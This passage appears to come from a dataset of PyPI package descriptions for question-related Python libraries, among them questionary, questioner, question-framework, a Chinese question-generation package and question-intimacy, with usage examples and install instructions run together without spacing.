\u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u043d\u043e\u0439 (\u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 questgen.exceptions.RollBackError). \u042d\u0442\u043e \u043d\u0435 \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0432\u0441\u0451 \u043f\u043b\u043e\u0445\u043e, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044e, \u0442.\u043a. \u0431\u044b\u043b \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0435\u0443\u0434\u0430\u0447\u043d\u044b\u0439 \u0433\u0440\u0430\u0444 \u0437\u0430\u0434\u0430\u043d\u0438\u044f.\u0418\u0437 \u044d\u0442\u043e\u0433\u043e \u0441\u043b\u0435\u0434\u0443\u0435\u0442, \u0447\u0442\u043e \u0434\u043b\u044f \u043b\u0443\u0447\u0448\u0435\u0439 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0431\u044b\u0441\u0442\u0440\u043e\u0439 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u043b\u0443\u0447\u0448\u0435 \u0438\u043c\u0435\u0442\u044c \u043c\u0438\u0440 \u043f\u043e\u0431\u043e\u043b\u044c\u0448\u0435, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u0431\u044b\u043b\u043e \u043c\u043d\u043e\u0433\u043e \u043a\u043e\u043b\u043b\u0438\u0437\u0438\u0439.\u041f\u0440\u0438\u043c\u0435\u0440\u0441\u043c../helpers/example.py\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440:./helpers/visualizer.py\u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0432./questgen/svgs/\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442graphviz\u0447\u0435\u0440\u0435\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443pygraph\u0415\u0441\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0435 (\u043f\u043e\u0435\u0445\u0430\u0432\u0448\u0438\u0435) \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f, \u043f\u043e\u0441\u0442\u0430\u0432\u044c\u0442\u0435 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e graphviz"} +{"package": "questionare", "pacakge-description": "Questionare by CraftYun83This is a simple library to lets you make surveys super easily with just a few commands!.Commands:questionare.helpquestionare.addQuestionquestionare.deleteQuestionquestionare.printQuestionsquestionare.setFinishedTextquestionare.startquestionare.answersquestionare.reset"} +{"package": "questionary", "pacakge-description": "Questionary\u2728 Questionary is a Python library for effortlessly building pretty command line interfaces \u2728FeaturesInstallationUsageDocumentationSupportimportquestionaryquestionary.text(\"What's your first name\").ask()questionary.password(\"What's your secret?\").ask()questionary.confirm(\"Are you amazed?\").ask()questionary.select(\"What do you want to do?\",choices=[\"Order a pizza\",\"Make a reservation\",\"Ask for opening hours\"],).ask()questionary.rawselect(\"What do you want to do?\",choices=[\"Order a pizza\",\"Make a reservation\",\"Ask for opening hours\"],).ask()questionary.checkbox(\"Select toppings\",choices=[\"foo\",\"bar\",\"bazz\"]).ask()questionary.path(\"Path to the projects version file\").ask()Used and supported byFeaturesQuestionary supports the following input prompts:TextPasswordFile PathConfirmationSelectRaw selectCheckboxAutocompleteThere is also a helper toprint formatted textfor when you want to spice up your printed messages a bit.InstallationUse the package managerpipto install Questionary:$pipinstallquestionary\n\u2728\ud83c\udf82\u2728Usageimportquestionaryquestionary.select(\"What do you want to do?\",choices=['Order a pizza','Make a reservation','Ask for opening hours']).ask()# returns value of selectionThat's all it takes to create a prompt! Have alook at the documentationfor some more examples.DocumentationDocumentation for Questionary is availablehere.SupportPleaseopen an issuewith enough information for us to reproduce your problem.\nAminimal, reproducible examplewould be very helpful.ContributingContributions are very much welcomed and appreciated. Head over to the documentation onhow to contribute.Authors and AcknowledgmentQuestionary is written and maintained by Tom Bocklisch and Kian Cross.It is based on the great work byOyetoke TobyandMark Fink.LicenseLicensed under theMIT License. Copyright 2021 Tom Bocklisch."} +{"package": "questionbuilder", "pacakge-description": "No description available on PyPI."} +{"package": "question-creation-app-realpython", "pacakge-description": "No description available on PyPI."} +{"package": "question-creation-distributable-app", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled-01", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled-02", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-pip", "pacakge-description": "No description available on PyPI."} +{"package": "questioner", "pacakge-description": "QuestionerA human-friendly Python library for asking people questions on the command-line.MotivationData often needs a human eye. I found myself writing over and over the code to help me investigate data manually on the command-line;questioneris my attempt to make this tool the right way once.It\u2019s suitable for:Labelling data manuallyfaster than you can in excel spreadsheets or similar setupsActive learning loopswhere you and a machine-learnining agent collaborate, reducing the need for training dataShort question-based UIson the command-line where you need a user\u2019s input to continueUsagePython APIYou write a simple Python api that asks you things.importquestionerwithquestioner.Cli()asc:is_hurt=c.yes_or_no('Are you hurt')symptom_set=c.choose_many('What symptoms do you have?',['pain','nausea','anxiety'],)rating=c.give_an_int('How would you rate this experience (1-5)',1,5)choice=c.choose_one('Which do you like best',['dogs','cats','horses'])On the terminalWhen run, the experience on the terminal looks like the following:$ python -m questioner.demo\nAre you hurt? (y/n) n\n\nWhat symptoms do you have?\n pain? (y/n) y\n nausea? (y/n) n\n anxiety? (y/n) n\n\nHow would you rate this experience (1-5)\n3\n\nWhich do you like best\n 0. dogs\n 1. cats\n 2. horses\n1The user can by default skip a question (raisingQuestionSkipped) by pressing enter, or quit the entire cli by pressingq(raisingQuitCli).FeaturesSupport for boolean, numeric, single-choice and multiple-choice questionsUses single-keystroke input where possibleLicenseMIT licensed.History0.1.0 (2019-02-15)First release on PyPI."} +{"package": "question-extractor", "pacakge-description": "No description available on PyPI."} +{"package": "questionextractorpackage", "pacakge-description": "No description available on PyPI."} +{"package": "questionflow", "pacakge-description": "A simple tool for managing your question and answer workflow."} +{"package": "question-framework", "pacakge-description": "Question Framework helps you to ask questions and get answers in a declarative way!Question FrameworkBasic Usagefromquestion_framework.questionimportQuestion,RepeatedQuestion,BranchedQuestionfromquestion_framework.user_inputimportaskquestions=[Question(\"Name\",\"Your name:\")]answers=ask(questions)print(answers)Output:Yourname:\nfoobar{'Name':'foobar'}Question TypesQuestionQuestionis basically a question with an answer.questions=[Question(\"Name\",\"Your name:\")]answers=ask(questions)print(answers)Output:Yourname:\nJohnDoe{'Name':'John Doe'}Repeated QuestionRepeatedQuestioncan be used to ask same question consecutively.questions=[RepeatedQuestion(\"Password\",\"Your password:\",2)]answers=ask(questions)print(answers)Output:Yourpassword:123Yourpassword:321Yourpassword:765{'Password':['123','321','765']}Branched QuestionBranchedQuestioncan be used to create one way adventures.game=[BranchedQuestion(\"Main\",\"Where to go? [N | E | S | W]\",[Question(\"N\",\"North is cold. You died! (type anything to exit)\"),Question(\"E\",\"You trigerred the trap. (type anything to exit)\"),BranchedQuestion(\"S\",\"You found a tresure chest! [open | leave]\",[Question(\"open\",\"It was a trap! (type anything to exit)\"),Question(\"leave\",\"You leave the cave.. (type anything to exit)\"),]),Question(\"W\",\"West is wild, you died! (type anything to exit)\"),])]answers=ask(game)Static Answers\"StaticAnswer\" can be used to provide a default value.fromquestion_framework.questionimportBranchedQuestion,StaticAnswer,Questionquestions=[BranchedQuestion(\"password\",\"Do you want to enter a password? [y|n]\",[Question(\"y\",\"What is your password?\"),StaticAnswer(\"n\",\"No password.\")])]answers=ask(questions)Output:Doyouwanttoenterapassword?[y|n]n{'password':{'n':'No password.','__answer':'n'}}ValidationsA validation function can be specified to validate answers. If validation fails, user will be asked to enter the input again.Question(\"Password\",\"Enter password:\",validation=lambdax:len(x)>5)Validation Error MessagesWhen a user provides input that does not satify a validation function, it may be desireable to give them a message. The ValidationError exception allows this.To use, raise the ValidationError exception from your validation function with your desired message.fromquestion_framework.questionimportQuestionfromquestion_framework.user_inputimportaskfromquestion_framework.validationimportValidationErrordefis_not_blank(x):ifnotx:raiseValidationError(\"Your answer may not be blank.\")returnTruequestions=[Question(\"Name\",\"Your name:\",validation=is_not_blank)]answers=ask(questions)Output:Yourname:\nYouranswermaynotbeblank.\nYourname:\nDavid{'Name':'David'}Post processA post process can be specified to transform answer.Question(\"Firstname\",\"Enter firstname:\",post_process=lambdax:x.upper())"} +{"package": "question-generation", "pacakge-description": "\u57fa\u4e8emt5\u7684\u4e2d\u6587\u95ee\u9898\u751f\u6210\u4efb\u52a1\u4e2d\u6587\u8bf4\u660e|English\u57fa\u4e8e\u9884\u8bad\u7ec3\u6a21\u578bmt5\u7cbe\u8c03\u7684\u95ee\u9898\u751f\u6210\u6a21\u578b\u5728\u7ebf\u6d4b\u8bd5\u53ef\u4ee5\u76f4\u63a5\u5728\u7ebf\u4f7f\u7528\u6211\u4eec\u7684\u6a21\u578bhttps://www.algolet.com/applications/qg\u4f7f\u7528\u8bf4\u660e\u6211\u4eec\u63d0\u4f9b\u4e86question_generation\u548cquestion_answering\u7684pipelineAPI\uff0c\u901a\u8fc7\u8c03\u7528\u5bf9\u5e94\u7684pipeline,\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u76f8\u5e94\u4efb\u52a1\u4e0b\u9762\u662f\u5982\u4f55\u4f7f\u7528\u95ee\u9898\u751f\u6210pipepline>>>fromquestion_generationimportpipeline# Allocate a pipeline for question-generation# cpu\u7248\u672c, \u5982\u679c\u4e0d\u4f20\u5165device\u53c2\u6570\uff0c\u9ed8\u8ba4\u662fcpu\u7248\u672c\uff0c>>>qg=pipeline(\"question-generation\",device=\"cpu\")# gpu\u7248\u672c>>>qg=pipeline(\"question-generation\",device=\"cuda\")# for single text>>>qg(\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\")['\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?','\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?','\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?']# for batch input>>>texts=[\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\"]>>>qg(texts)[['\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?','\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?','\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?']]\u53ef\u4ee5\u4f7f\u7528\u4f60\u81ea\u5df1\u8bad\u7ec3\u7684\u6a21\u578b\uff0c\u6216\u8005\u4e0b\u8f7dhuggingface hub\u4e2d\u5df2\u7ecf\u5fae\u8c03\u597d\u7684\u6a21\u578b. PyTorch\u7248\u672c\u7684\u4f7f\u7528\u65b9\u5f0f\u5982\u4e0b:>>>fromtransformersimportAutoTokenizer,AutoModelForSeq2SeqLM>>>tokenizer=AutoTokenizer.from_pretrained(\"algolet/mt5-base-chinese-qg\")>>>model=AutoModelForSeq2SeqLM.from_pretrained(\"algolet/mt5-base-chinese-qg\")>>>pipe=pipeline(\"question-generation\",model=model,tokenizer=tokenizer)\u540c\u65f6\uff0c\u6211\u4eec\u4e5f\u63d0\u4f9b\u7684\u95ee\u7b54pipeline,\u53ef\u4ee5\u4e0e\u95ee\u9898\u751f\u6210\u6a21\u5757\u96c6\u6210\uff0c\u4ea7\u751f\u95ee\u9898\u81ea\u52a8\u751f\u6210\u4e0e\u56de\u7b54\u7684\u5e94\u7528\u3002\u4e0b\u9762\u662f\u5982\u4f55\u4f7f\u7528\u95ee\u7b54pipeline>>>fromquestion_generationimportpipeline# Allocate a pipeline for question-generation>>>qa=pipeline(\"question-answering\")>>>text=\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\"# for single qa input>>>question_answerer({...'question':'\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?',...'context':text...}){'answer':'\u8def\u8fb9','start':18,'end':20,'score':1.0}# for batch qa inputs>>>question_answerer([...{...'question':'\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?',...'context':text...},...{...'question':'\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?',...'context':text...},...{...'question':'\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?',...'context':text...}])[{'answer':'\u8def\u8fb9','start':18,'end':20,'score':1.0},{'answer':'\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94','start':102,'end':124,'score':0.9996},{'answer':'\u653e\u5728\u6000\u91cc','start':40,'end':44,'score':0.9995}]qa\u7684\u8fd4\u56de\u4e2d\uff0canswer\u4e3a\u7b54\u6848\uff0cstart\u548cend\u5206\u522b\u4e3a\u7b54\u6848\u5728\u539f\u6587\u4e2d\u7684\u5f00\u59cb\u4f4d\u7f6e\u548c\u7ed3\u675f\u4f4d\u7f6e\u5b89\u88c5\u8bf4\u660e\u9700\u8981\u5b89\u88c5pytorch>=1.3, transormfers>=4.12.5 \u548c datasets>=1.15.1, pip\u5b89\u88c5\u901f\u5ea6\u5982\u679c\u8f83\u6162\uff0c\u53ef\u4f7f\u7528\u963f\u91cc\u6e90\uff0c\u5728\u5b89\u88c5\u547d\u4ee4\u540e\u6dfb\u52a0 -ihttps://mirrors.aliyun.com/pypi/simple/cuda\u7248pytorch\u5b89\u88c5pip3installtorch==1.10.0+cu113torchvision==0.11.1+cu113torchaudio==0.10.0+cu113-fhttps://download.pytorch.org/whl/cu113/torch_stable.htmlcup\u7248pytorh\u5b89\u88c5pip3installtorch==1.10.0+cputorchvision==0.11.1+cputorchaudio==0.10.0+cpu-fhttps://download.pytorch.org/whl/cpu/torch_stable.html\u5b89\u88c5transformers\u548cdatasetspipinstalltransformers\npipinstalldatasets\u5b89\u88c5\u672c\u9879\u76eepipinstallquestion_generation\u6a21\u578b\u8bad\u7ec3\u4f60\u53ef\u4ee5\u8bad\u7ec3\u81ea\u5df1\u7684\u95ee\u9898\u751f\u6210\u6a21\u578b\u548c\u95ee\u7b54\u6a21\u578b\u95ee\u9898\u751f\u6210\u6a21\u578b\u8bad\u7ec3\u8bad\u7ec3\u6570\u636e\u683c\u5f0f>>>train.json{\"data\":[{\"source_text\":\"\u5bf9\u4e8e\u67d0\u4e9b\u7269\u7406\u60c5\u51b5\uff0c\u4e0d\u53ef\u80fd\u5c06\u529b\u7684\u5f62\u6210\u5f52\u56e0\u4e8e\u52bf\u7684\u68af\u5ea6\u3002\u8fd9\u901a\u5e38\u662f\u7531\u4e8e\u5b8f\u89c2\u7269\u7406\u7684\u8003\u8651\uff0c\u5c48\u670d\u529b\u4ea7\u751f\u4e8e\u5fae\u89c2\u72b6\u6001\u7684\u5b8f\u89c2\u7edf\u8ba1\u5e73\u5747\u503c\u3002\u4f8b\u5982\uff0c\u6469\u64e6\u662f\u7531\u539f\u5b50\u95f4\u5927\u91cf\u9759\u7535\u52bf\u7684\u68af\u5ea6\u5f15\u8d77\u7684\uff0c\u4f46\u8868\u73b0\u4e3a\u72ec\u7acb\u4e8e\u4efb\u4f55\u5b8f\u89c2\u4f4d\u7f6e\u77e2\u91cf\u7684\u529b\u6a21\u578b\u3002\u975e\u4fdd\u5b88\u529b\u9664\u6469\u64e6\u529b\u5916\uff0c\u8fd8\u5305\u62ec\u5176\u4ed6\u63a5\u89e6\u529b\u3001\u62c9\u529b\u3001\u538b\u7f29\u529b\u548c\u963b\u529b\u3002\u7136\u800c\uff0c\u5bf9\u4e8e\u4efb\u4f55\u8db3\u591f\u8be6\u7ec6\u7684\u63cf\u8ff0\uff0c\u6240\u6709\u8fd9\u4e9b\u529b\u90fd\u662f\u4fdd\u5b88\u529b\u7684\u7ed3\u679c\uff0c\u56e0\u4e3a\u6bcf\u4e00\u4e2a\u5b8f\u89c2\u529b\u90fd\u662f\u5fae\u89c2\u52bf\u68af\u5ea6\u7684\u51c0\u7ed3\u679c\u3002\",\"target_text\":\"\u62c9\u529b\u3001\u538b\u7f29\u548c\u62c9\u529b\u662f\u4ec0\u4e48\u529b?{sep_token}\u9759\u7535\u68af\u5ea6\u7535\u52bf\u4f1a\u4ea7\u751f\u4ec0\u4e48?{sep_token}\u4e3a\u4ec0\u4e48\u8fd9\u4e9b\u529b\u662f\u65e0\u6cd5\u5efa\u6a21\u7684\u5462?\"}{\"source_text\":\"\u7eff\u5b9d\u77f3\u5931\u7a83\u6848 \uff08\u6cd5\u8bed\uff1a Les Bijoux de la Castafiore \uff1b\u82f1\u8bed\uff1a The Castafiore Emerald \uff09\u662f\u4e01\u4e01\u5386\u9669\u8bb0\u7684\u7b2c21\u90e8\u4f5c\u54c1\u3002\u4f5c\u8005\u662f\u6bd4\u5229\u65f6\u6f2b\u753b\u5bb6\u57c3\u5c14\u70ed\u3002\u672c\u4f5c\u4e0e\u4e4b\u524d\u7684\u4e01\u4e01\u5386\u9669\u8bb0\u6709\u8457\u5f88\u5927\u7684\u4e0d\u540c\uff0c\u4e01\u4e01\u9996\u6b21\u8fdb\u884c\u6ca1\u6709\u79bb\u5f00\u81ea\u5df1\u5bb6\u7684\u5192\u9669\uff0c\u540c\u65f6\u6545\u4e8b\u4e2d\u6ca1\u6709\u660e\u663e\u7684\u53cd\u6d3e\u89d2\u8272\uff0c\u5145\u6ee1\u4e86\u559c\u5267\u8272\u5f69\u3002\u4e01\u4e01\u548c\u8239\u957f\u539f\u672c\u5728\u57ce\u5821\u60a0\u95f2\u5ea6\u5047\uff0c\u5374\u56e0\u6b4c\u540e\u7a81\u7136\u9020\u8bbf\u800c\u5f04\u5f97\u9e21\u98de\u72d7\u8df3\uff1b\u5a92\u4f53\u5bf9\u6b4c\u540e\u7684\u884c\u8e2a\u6781\u5ea6\u5173\u6ce8\uff0c\u7a77\u8ffd\u731b\u6253\uff1b\u6b4c\u540e\u4e00\u9897\u73cd\u8d35\u7684\u7eff\u5b9d\u77f3\u53c8\u7a81\u7136\u5931\u8e2a\uff0c\u5f15\u8d77\u4e86\u4e00\u6ce2\u63a5\u4e00\u6ce2\u7684\u7591\u56e2\uff0c\u7a76\u7adf\u8c01\u7684\u5acc\u7591\u6700\u5927\uff1f\u662f\u8239\u957f\u521a\u521a\u6536\u7559\u7684\u4e00\u4f19\u5409\u535c\u8d5b\u4eba\uff1f\u662f\u5077\u5077\u6df7\u5165\u8bb0\u8005\u7fa4\u4e2d\u7684\u795e\u79d8\u7537\u5b50\uff1f\u662f\u6b4c\u540e\u7684\u8d34\u8eab\u5973\u4ec6\uff1f\u8fd8\u662f\u884c\u8ff9\u9b3c\u795f\u7684\u94a2\u7434\u5e08\uff1f\"\uff0c\"target_text\":\"\u6545\u4e8b\u4e2d\u5f15\u8d77\u4f17\u591a\u8c1c\u56e2\u7684\u539f\u56e0\u662f\uff1f{sep_token}\u6b64\u90e8\u4f5c\u54c1\u4e0e\u4ee5\u5f80\u4e0d\u540c\u7684\u5730\u65b9\u5728\u4e8e\u54ea\u91cc\uff1f{sep_token}\u4e01\u4e01\u548c\u8239\u957f\u7684\u60a0\u95f2\u5047\u671f\u56e0\u4f55\u88ab\u6253\u4e71\uff1f{sep_token}\u300a\u7eff\u5b9d\u77f3\u5931\u7a83\u6848\u300b\u662f\u300a\u4e01\u4e01\u5386\u9669\u8bb0\u300b\u7cfb\u5217\u7684\u7b2c\u51e0\u90e8\uff1f{sep_token}\u300a\u7eff\u5b9d\u77f3\u5931\u7a83\u6848\u300b\u7684\u4f5c\u8005\u662f\u8c01\uff1f\"}...]}\u8bad\u7ec3\u914d\u7f6e\u6587\u4ef6>>>qg_config.json{\"model_name_or_path\":\"google/mt5-small\",\"tokenizer_name\":\"google/mt5-small\",\"text_column\":\"source_text\",\"summary_column\":\"target_text\",\"train_file\":\"data/train.json\",\"validation_file\":\"data/dev.json\",\"output_dir\":\"data/qg\",\"model_type\":\"mt5\",\"overwrite_output_dir\":true,\"do_train\":true,\"do_eval\":true,\"source_prefix\":\"question generation: \",\"predict_with_generate\":true,\"per_device_train_batch_size\":8,\"per_device_eval_batch_size\":8,\"gradient_accumulation_steps\":32,\"learning_rate\":1e-3,\"num_train_epochs\":4,\"max_source_length\":512,\"max_target_length\":200,\"logging_steps\":100,\"seed\":42}\u542f\u52a8\u8bad\u7ec3CUDA_VISIBLE_DEVICES=0 python run_qg.py qg_config.json\u95ee\u7b54\u6a21\u578b\u8bad\u7ec3\u8bad\u7ec3\u6570\u636e\u683c\u5f0f\u4e0esquad_2\u7684\u6570\u636e\u683c\u5f0f\u4e00\u81f4>>>train.json{'version':2.0,'data':[{'id':'c398789b7375e0ce7eac86f2b18c3808','question':'\u9690\u85cf\u5f0f\u884c\u8f66\u8bb0\u5f55\u4eea\u54ea\u4e2a\u724c\u5b50\u597d','context':'\u63a8\u8350\u4f7f\u7528360\u884c\u8f66\u8bb0\u5f55\u4eea\u3002\u884c\u8f66\u8bb0\u5f55\u4eea\u7684\u597d\u574f\uff0c\u53d6\u51b3\u4e8e\u884c\u8f66\u8bb0\u5f55\u4eea\u7684\u6444\u50cf\u5934\u914d\u7f6e\uff0c\u914d\u7f6e\u8d8a\u9ad8\u8d8a\u597d\uff0c\u518d\u5c31\u662f\u6027\u4ef7\u6bd4\u3002 \u884c\u8f66\u8bb0\u5f55\u4eea\u914d\u7f6e\u9700\u89811296p\u8d85\u9ad8\u6e05\u6444\u50cf\u5934\u6bd4\u8f83\u597d\uff0c\u8fd9\u6837\u5f55\u5236\u89c6\u9891\u6e05\u6670\u5ea6\u9ad8\u3002\u518d\u5c31\u662f\u4ef7\u683c\uff0c\u6027\u4ef7\u6bd4\u9ad8\u4e5f\u662f\u53ef\u4ee5\u503c\u5f97\u8003\u8651\u7684\u3002 360\u884c\u8f66\u8bb0\u5f55\u4eea\u6211\u4f7f\u7528\u4e86\u4e00\u6bb5\u65f6\u95f4 \uff0c\u89c9\u5f97360\u884c\u8f66\u8bb0\u5f55\u4eea\u6bd4\u8f83\u597d\u5f55\u5f97\u5e7f\u89d2\u6bd4\u8f83\u5927\uff0c\u5e76\u4e14\u4fbf\u5b9c\u5b9e\u60e0 \uff0c\u4ef7\u683c\u624d299\uff0c\u5728360\u5546\u57ce\u53ef\u4ee5\u4e70\u5230\u3002\u53ef\u4ee5\u53c2\u8003\u5bf9\u6bd4\u4e0b\u3002','answers':{'answer_start':[4],'text':['360\u884c\u8f66\u8bb0\u5f55\u4eea']}}]}\u8bad\u7ec3\u914d\u7f6e\u6587\u4ef6>>>qg_config.json{\"model_name_or_path\":\"bert-base-chinese\",\"tokenizer_name\":\"bert-base-chinese\",\"train_file\":\"data/train.json\",\"validation_file\":\"data/dev.json\",\"output_dir\":\"data/qa\",\"per_device_train_batch_size\":8,\"per_device_eval_batch_size\":8,\"gradient_accumulation_steps\":32,\"overwrite_output_dir\":true,\"do_train\":true,\"do_eval\":true,\"max_answer_length\":200}\u542f\u52a8\u8bad\u7ec3CUDA_VISIBLE_DEVICES=0 python run_qa.py qa_config.json"} +{"package": "questiongeneratorcesar", "pacakge-description": "This is the first version of the question generator package"} +{"package": "questionify", "pacakge-description": "QuestionifyQuestionifyis a simple desktop software to help you study. The concept is\nsimple; fill it with questions you must practice answering, and it helps you\ngenerate a well-balanced list of questions day after day, allowing you to keep\nyour knowledge sharp.Initially developed for my own need; made public later under theGNU GPLv3license."} +{"package": "question-intimacy", "pacakge-description": "Question-IntimacyIntroquestion-intimacy is a package used to estimate the intimacy of questions. It is released with\nEMNLP 2020 paperQuantifying Intimacy in Language.InstallUse pipIfpipis installed, question-intimacy could be installed directly from it:pip3 install question-intimacyDependenciespython>=3.6.0\ntorch>=1.6.0\ntransformers >= 3.1.0\nnumpy\nmath\ntqdmUsage and ExampleNotes: During your first usage, the package will download a model file automatically, which is about 500MB.Construct the Predictor Object>>> from question_intimacy.predict_intimacy import IntimacyEstimator\n>>> inti = IntimacyEstimator()Cuda is disabled by default, to allow GPU calculation, please use>>> from question_intimacy.predict_intimacy import IntimacyEstimator\n>>> inti = IntimacyEstimator(cuda=True)predictpredictis the core method of this package,\nwhich takes a single text of a list of texts, and returns a list of raw values in[-1,1](higher means more intimate, while lower means less).# Predict intimacy for one question\n>>> text = 'What is this movie ?''\n>>> inti.predict(text,type='list')\n-0.2737383\n\n# Predict intimacy for a list of questions (less than a batch)\n>>> text = ['What is this movie ?','Why do you hate me ?']\n>>> 